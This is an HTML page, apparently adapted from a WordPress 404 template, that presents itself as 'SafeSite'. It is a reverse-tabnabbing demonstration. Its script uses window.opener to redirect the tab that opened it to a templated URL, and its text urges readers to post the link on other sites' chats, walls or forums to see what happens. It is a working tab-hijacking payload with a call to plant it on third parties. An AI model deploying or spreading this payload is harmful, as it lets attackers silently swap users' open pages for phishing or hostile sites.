<html prefix="og: http://ogp.me/ns#" class=" js flexbox flexboxlegacy canvas canvastext webgl no-touch geolocation postmessage no-websqldatabase indexeddb hashchange history draganddrop websockets rgba hsla multiplebgs backgroundsize borderimage borderradius boxshadow textshadow opacity cssanimations csscolumns cssgradients no-cssreflections csstransforms csstransforms3d csstransitions fontface generatedcontent video audio localstorage sessionstorage webworkers applicationcache svg inlinesvg smil svgclippaths" style="" lang="es-PE"><!--<![endif]--><head><meta class="foundation-mq-small"><meta class="foundation-mq-small-only"><meta class="foundation-mq-medium"><meta class="foundation-mq-medium-only"><meta class="foundation-mq-large"><meta class="foundation-mq-large-only"><meta class="foundation-mq-xlarge"><meta class="foundation-mq-xlarge-only"><meta class="foundation-mq-xxlarge"><meta class="foundation-data-attribute-namespace">
  <meta charset="utf-8">
  <meta name="HandheldFriendly" content="True">
  <meta name="MobileOptimized" content="320">
  <meta name="theme-color" content="#000000">
  <meta name="viewport" content="width=device-width, user-scalable=no, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0">
  <title>SafeSite</title>


  <!-- styles -->
<link rel="icon" href="https://www.athelas.pe/wp-content/themes/athelas/favicon.png">



<!-- This site is optimized with the Yoast SEO plugin v5.8 - https://yoast.com/wordpress/plugins/seo/ -->
<meta name="robots" content="noindex,follow">



<link rel="stylesheet" id="base-css" href="https://www.athelas.pe/wp-content/themes/athelas/style.css" type="text/css" media="all">
<link rel="stylesheet" id="main-css" href="https://www.athelas.pe/wp-content/themes/athelas/dist/css/app.min.css" type="text/css" media="all">
<script type="text/javascript" src="https://www.athelas.pe/wp-content/themes/athelas/dist/js/vendor/modernizr.min.js"></script>
<link rel="https://api.w.org/" href="https://www.athelas.pe/wp-json/">
<link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://www.athelas.pe/xmlrpc.php?rsd">
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://www.athelas.pe/wp-includes/wlwmanifest.xml"> 
<meta name="generator" content="WordPress 4.9.1">
		<style type="text/css">.recentcomments a{display:inline !important;padding:0 !important;margin:0 !important;}</style>


	<style>
		body {
			margin: 0; 
		}
		.main-wrapper{
			background-image:url(https://www.athelas.pe/wp-content/themes/athelas/dist/img/backgrounds/bg-404.jpg);
			background-position:0 0;
			background-size: 100%;
			background-repeat:no-repeat;
			background-color: #1e2831;
			min-height: 100vh;
		}
		.green-clouds {
			display:block;
			width:100%;
			padding-top:10%;
		}
		
		
		.lost-text{
			color:snow;
			font-family: 'Roboto', monospace;
			text-align: center;
		    font-size: 48px;
		    font-weight: 100;
		}
		.mensaje-text {
			font-family: 'Roboto', monospace;
			font-weight: 300;
			color: #A2A4A7;
		    text-align: center;
		    font-size: 20px;
		    max-width: 70%;
		    margin: 0 auto;
		}
		.back-button{
			font-family: 'Roboto', monospace;
			font-weight: 300;
			background-color: #419A45;
		    padding: 5px 10px;
		    text-align: center;
		    display: block;
		    width: 125px;
		    margin: 0 auto;
		    color: white;
		    text-decoration: none;
		}
		.back-button:hover {
		    background-color: #3C643F;
		    color: #1e2831;
		}
		h3{
			color:snow;
			font-family: 'Roboto', monospace;
			text-align: center;
		    font-size: 35px;
		    font-weight: 100;
		}

		.subtitle-text{
			font-family: 'Roboto', monospace;
			font-weight: 300;
			color: snow;
		    text-align: center;
		    font-size: 20px;
		    max-width: 70%;
		    margin: 0 auto;
		}


	</style>
</head>


<body class="error404">

<!-- Main Wrapper here (has blueSky as bg) -->
<div class="main-wrapper">
	<!-- Green clouds bg -->
	<div class="green-clouds">
		<h1 class="lost-text">Safesite?</h1>
		
		<p class="subtitle-text">So, this is a safe site, you shouldn't have to worry about visiting it, all your friends are using it, and it's even appeared in the media. </p>
		
	</div>
	

	<div class="mensaje">
		
		<br>
		<h3 >Safe content</h3>
		<p class="mensaje-text">Sometimes, people I know, or even people I don't know, like to share link on the internet, that's good, that's what the internet was built for!</p>
		<p class="mensaje-text">The problem is, even we "internet" people might have no idea about how certain things work. I found out about this vulnerability a year ago, and since it's not listed as such, not many people have donde anything to solve it.</p>
		<p class="mensaje-text">If you would like to test if a site has got a vulnerability, just add a link to this website on their chat/wall/forum system and publish it. Afterwards just click on it and see if anything happens to their website.</p>
		<br>
		<h3 >safesite.ondoheer.com</h3>
		
	</div>

</div>



        
        



<script>

		if (window.opener) {
			window.opener.location = '{{replacement_url}}?referrer='+document.referrer;
			console.log(window.opener);
		}

	</script>


	
    
    

</body>
</html>